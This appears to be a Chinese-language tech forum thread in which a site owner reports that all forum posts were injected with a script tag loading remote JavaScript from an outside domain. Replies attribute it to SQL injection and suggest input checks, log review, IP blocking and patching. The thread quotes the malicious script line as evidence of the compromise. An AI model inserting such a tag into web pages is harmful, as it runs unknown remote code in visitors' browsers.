請教各位前輩先進:
如果發生這樣的事情,討論區每一篇文章內容變成...
你好 本人姓黃做cnc銑床代工 有<script src=http://www.dota11.cn/m.js></script>
前台的留言已經有完善的過濾機制,還是被攻擊了... >"<
我確定這是後來才被動的手腳,
因為每個人的文章都變成這樣了!每一篇!
請問這是從伺服器本身的弱點攻擊,
還是透過網頁程式呢?
已邀請的邦友 {{ invite_list.length }}/5
這應該是SQL Injection的方式入侵的, 除了留言的程式外, 提供瀏覽的程式也要做輸入值的檢查. 將; ' " 等符號進行檢查與替換.
已被攻擊的站台, 如果Web log沒有被清除掉, 查看看log就可以看的攻擊的方式.
如果你看到攻擊字串是亂碼, 那就是Hacker使用編碼的方式攻擊.
十之八九是Web應用程式的弱點被打進去
你的症狀跟這陣子新聞在炒作,大陸人寫自動SQL Injection工具攻擊的狀況一樣
所以大概是你的程式有SQL injection問題
把你的 Web Server 的記錄檔調出來看看,多少能看出一點端倪
可以知道大概是哪隻程式出錯
1.針對特定IP封死它對本機的出入口(從 Log 檔抓,來打廣告的就殺)!
2.如前輸網友所提,釜底抽薪的方法是找出哪隻網頁程式出現問題,有能力或Patch檔就修正!
3.最差的情況,暫時無方案可解只好先停掉!
iThome鐵人賽
看影片追技術